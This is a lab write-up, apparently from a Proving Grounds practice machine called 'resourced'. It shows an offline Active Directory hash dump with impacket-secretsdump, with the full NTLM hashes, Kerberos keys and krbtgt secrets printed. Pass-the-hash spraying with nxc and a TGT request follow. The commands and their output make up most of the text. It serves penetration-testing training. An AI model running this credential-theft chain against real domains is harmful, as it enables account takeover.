Hashdump

Registry hive files as well as the NTDS.DIT file were discovered in the Password Audit share. Those files have been downloaded to Kali for dumping hashes.

┌──(kali㉿kali)-[~/…/PG_PRACTICE/resourced/smb/Password Audit]
└─$ impacket-secretsdump local -system registry/SYSTEM -security registry/SECURITY -ntds Active\ Directory/ntds.dit
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:507fdb105d9322cf53420c95780adf5f2dcdac7ca14f8b37188370c916a3fa6f2a511bb284aeac71211c939a866a2b4cc02c408e1d242ad4f5cc8f7b85d2448c18d23fb47f7b9b543a6cfb8999e40037f23dbfd8690869753979d15fe61bdcddb0ccff3d20c275207ca93e844c3b5aa1f658198225b3e54f90e0b71aaf76ba32bb1b598d189b6696c27d04674fd4c4f2c09d0df2e59fe93850aa928be813be3bd659f0d2ecba6e34fb5a3880db8155cf77e21eb44d63e1ae65abcc2aa5bdfb6bfe85e8590329929522aae501ba86d8622918e37b41daef8a2b00e78440d13e88a31fc14714923bba6fb99e13c81b3020
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x85ec8dd0e44681d9dc3ed5f0c130005786daddbd
dpapi_userkey:0x22043071c1e87a14422996eda74f2c72535d4931
[*] NL$KM 
 0000   31 BF AC 76 98 3E CF 4A  FC BD AD 0F 17 0F 49 E7   1..v.>.J......I.
 0010   DA 65 A6 F9 C7 D4 FA 92  0E 5C 60 74 E6 67 BE A7   .e.......\`t.g..
 0020   88 14 9D 4D E5 A5 3A 63  E4 88 5A AC 37 C7 1B F9   ...M..:c..Z.7...
 0030   53 9C C1 D1 6F 63 6B D1  3F 77 F4 3A 32 54 DA AC   S...ock.?w.:2T..
NL$KM:31bfac76983ecf4afcbdad0f170f49e7da65a6f9c7d4fa920e5c6074e667bea788149d4de5a53a63e4885aac37c71bf9539cc1d16f636bd13f77f43a3254daac
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94
[*] Reading and decrypting hashes from Active Directory/ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
[*] Kerberos keys from Active Directory/ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:73410f03554a21fb0421376de7f01d5fe401b8735d4aa9d480ac1c1cdd9dc0c8
Administrator:aes128-cts-hmac-sha1-96:b4fc11e40a842fff6825e93952630ba2
Administrator:des-cbc-md5:80861f1a80f1232f
RESOURCEDC$:aes256-cts-hmac-sha1-96:b97344a63d83f985698a420055aa8ab4194e3bef27b17a8f79c25d18a308b2a4
RESOURCEDC$:aes128-cts-hmac-sha1-96:27ea2c704e75c6d786cf7e8ca90e0a6a
RESOURCEDC$:des-cbc-md5:ab089e317a161cc1
krbtgt:aes256-cts-hmac-sha1-96:12b5d40410eb374b6b839ba6b59382cfbe2f66bd2e238c18d4fb409f4a8ac7c5
krbtgt:aes128-cts-hmac-sha1-96:3165b2a56efb5730cfd34f2df472631a
krbtgt:des-cbc-md5:f1b602194f3713f8
M.Mason:aes256-cts-hmac-sha1-96:21e5d6f67736d60430facb0d2d93c8f1ab02da0a4d4fe95cf51554422606cb04
M.Mason:aes128-cts-hmac-sha1-96:99d5ca7207ce4c406c811194890785b9
M.Mason:des-cbc-md5:268501b50e0bf47c
K.Keen:aes256-cts-hmac-sha1-96:9a6230a64b4fe7ca8cfd29f46d1e4e3484240859cfacd7f67310b40b8c43eb6f
K.Keen:aes128-cts-hmac-sha1-96:e767891c7f02fdf7c1d938b7835b0115
K.Keen:des-cbc-md5:572cce13b38ce6da
L.Livingstone:aes256-cts-hmac-sha1-96:cd8a547ac158c0116575b0b5e88c10aac57b1a2d42e2ae330669a89417db9e8f
L.Livingstone:aes128-cts-hmac-sha1-96:1dec73e935e57e4f431ac9010d7ce6f6
L.Livingstone:des-cbc-md5:bf01fb23d0e6d0ab
J.Johnson:aes256-cts-hmac-sha1-96:0452f421573ac15a0f23ade5ca0d6eada06ae85f0b7eb27fe54596e887c41bd6
J.Johnson:aes128-cts-hmac-sha1-96:c438ef912271dbbfc83ea65d6f5fb087
J.Johnson:des-cbc-md5:ea01d3d69d7c57f4
V.Ventz:aes256-cts-hmac-sha1-96:4951bb2bfbb0ffad425d4de2353307aa680ae05d7b22c3574c221da2cfb6d28c
V.Ventz:aes128-cts-hmac-sha1-96:ea815fe7c1112385423668bb17d3f51d
V.Ventz:des-cbc-md5:4af77a3d1cf7c480
S.Swanson:aes256-cts-hmac-sha1-96:8a5d49e4bfdb26b6fb1186ccc80950d01d51e11d3c2cda1635a0d3321efb0085
S.Swanson:aes128-cts-hmac-sha1-96:6c5699aaa888eb4ec2bf1f4b1d25ec4a
S.Swanson:des-cbc-md5:5d37583eae1f2f34
P.Parker:aes256-cts-hmac-sha1-96:e548797e7c4249ff38f5498771f6914ae54cf54ec8c69366d353ca8aaddd97cb
P.Parker:aes128-cts-hmac-sha1-96:e71c552013df33c9e42deb6e375f6230
P.Parker:des-cbc-md5:083b37079dcd764f
R.Robinson:aes256-cts-hmac-sha1-96:90ad0b9283a3661176121b6bf2424f7e2894079edcc13121fa0292ec5d3ddb5b
R.Robinson:aes128-cts-hmac-sha1-96:2210ad6b5ae14ce898cebd7f004d0bef
R.Robinson:des-cbc-md5:7051d568dfd0852f
D.Durant:aes256-cts-hmac-sha1-96:a105c3d5cc97fdc0551ea49fdadc281b733b3033300f4b518f965d9e9857f27a
D.Durant:aes128-cts-hmac-sha1-96:8a2b701764d6fdab7ca599cb455baea3
D.Durant:des-cbc-md5:376119bfcea815f8
G.Goldberg:aes256-cts-hmac-sha1-96:0d6ac3733668c6c0a2b32a3d10561b2fe790dab2c9085a12cf74c7be5aad9a91
G.Goldberg:aes128-cts-hmac-sha1-96:00f4d3e907818ce4ebe3e790d3e59bf7
G.Goldberg:des-cbc-md5:3e20fd1a25687673
[*] Cleaning up...

These hashes might still be valid.

Validation

I will be brute-forcing hashes

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ cat ntlm_hashes.txt 
aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d
aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d
aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b
aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45
aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c
aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808
aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726
aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c
aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939
aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe
aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac
aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35
aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2

Extracted the NTLM hashes from the hashdump earlier

NTLM

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ nxc smb ResourceDC.resourced.local -d RESOURCED.LOCAL -u ./users.txt -H ./ntlm_hashes.txt --continue-on-success
SMB         192.168.169.175 445    RESOURCEDC       [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
 
[...REDACTED...]
 
SMB         192.168.169.175 445    RESOURCEDC       [-] RESOURCED.LOCAL\Guest:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_ACCOUNT_DISABLED
 
SMB         192.168.169.175 445    RESOURCEDC       [-] RESOURCED.LOCAL\M.Mason:3105e0f6af52aba8e11d19f27e487e45 STATUS_PASSWORD_EXPIRED
 
SMB         192.168.169.175 445    RESOURCEDC       [-] RESOURCED.LOCAL\K.Keen:204410cc5a7147cd52a04ddae6754b0c STATUS_PASSWORD_EXPIRED
 
SMB         192.168.169.175 445    RESOURCEDC       [+] RESOURCED.LOCAL\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
 
SMB         192.168.169.175 445    RESOURCEDC       [-] RESOURCED.LOCAL\J.Johnson:3e028552b946cc4f282b72879f63b726 STATUS_PASSWORD_EXPIRED
 
SMB         192.168.169.175 445    RESOURCEDC       [+] RESOURCED.LOCAL\V.Ventz:913c144caea1c0a936fd1ccb46929d3c
 
SMB         192.168.169.175 445    RESOURCEDC       [-] RESOURCED.LOCAL\S.Swanson:bd7c11a9021d2708eda561984f3c8939 STATUS_PASSWORD_EXPIRED
 
SMB         192.168.169.175 445    RESOURCEDC       [-] RESOURCED.LOCAL\P.Parker:980910b8fc2e4fe9d482123301dd19fe STATUS_PASSWORD_EXPIRED
 
SMB         192.168.169.175 445    RESOURCEDC       [-] RESOURCED.LOCAL\R.Robinson:fea5a148c14cf51590456b2102b29fac STATUS_PASSWORD_EXPIRED
 
SMB         192.168.169.175 445    RESOURCEDC       [-] RESOURCED.LOCAL\D.Durant:08aca8ed17a9eec9fac4acdcb4652c35 STATUS_PASSWORD_EXPIRED
 
SMB         192.168.169.175 445    RESOURCEDC       [-] RESOURCED.LOCAL\G.Goldberg:62e16d17c3015c47b4d513e65ca757a2 STATUS_PASSWORD_EXPIRED

The l.livingstone user credential hash is valid; 19a3a7550ce8c505c2d46b5e39d6f808
Lots of users with STATUS_PASSWORD_EXPIRED
- Technically, this would mean that I can reset the password of those users

Kerberos

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ nxc smb ResourceDC.resourced.local -d RESOURCED.LOCAL -u ./users.txt -H ./ntlm_hashes.txt --continue-on-success -k --kdcHost ResourceDC.resourced.local
SMB         ResourceDC.resourced.local 445    RESOURCEDC       [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
 
[...REDACTED...]
 
SMB         ResourceDC.resourced.local 445    RESOURCEDC       [-] RESOURCED.LOCAL\M.Mason:3105e0f6af52aba8e11d19f27e487e45 KDC_ERR_KEY_EXPIRED
 
SMB         ResourceDC.resourced.local 445    RESOURCEDC       [-] RESOURCED.LOCAL\K.Keen:204410cc5a7147cd52a04ddae6754b0c KDC_ERR_KEY_EXPIRED
 
SMB         ResourceDC.resourced.local 445    RESOURCEDC       [+] RESOURCED.LOCAL\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
 
SMB         ResourceDC.resourced.local 445    RESOURCEDC       [+] RESOURCED.LOCAL\V.Ventz:913c144caea1c0a936fd1ccb46929d3c
 
SMB         ResourceDC.resourced.local 445    RESOURCEDC       [-] RESOURCED.LOCAL\S.Swanson:bd7c11a9021d2708eda561984f3c8939 KDC_ERR_KEY_EXPIRED
 
SMB         ResourceDC.resourced.local 445    RESOURCEDC       [-] RESOURCED.LOCAL\P.Parker:980910b8fc2e4fe9d482123301dd19fe KDC_ERR_KEY_EXPIRED
 
SMB         ResourceDC.resourced.local 445    RESOURCEDC       [-] RESOURCED.LOCAL\R.Robinson:fea5a148c14cf51590456b2102b29fac KDC_ERR_KEY_EXPIRED
 
SMB         ResourceDC.resourced.local 445    RESOURCEDC       [-] RESOURCED.LOCAL\D.Durant:08aca8ed17a9eec9fac4acdcb4652c35 KDC_ERR_KEY_EXPIRED
 
SMB         ResourceDC.resourced.local 445    RESOURCEDC       [-] RESOURCED.LOCAL\G.Goldberg:62e16d17c3015c47b4d513e65ca757a2 KDC_ERR_KEY_EXPIRED

The same result can be seen when authenticating the target KDC

TGT

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-getTGT RESOURCED.LOCAL/l.livingstone@ResourceDC.resourced.local -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Saving ticket in l.livingstone@ResourceDC.resourced.local.ccache

Validated TGT generated for the l.livingstone user

InfoSec LAB

Explorer

Resourced_Hashdump

Hashdump

Validation

NTLM

Kerberos

TGT

Interactive Graph View

Table of Contents

Backlinks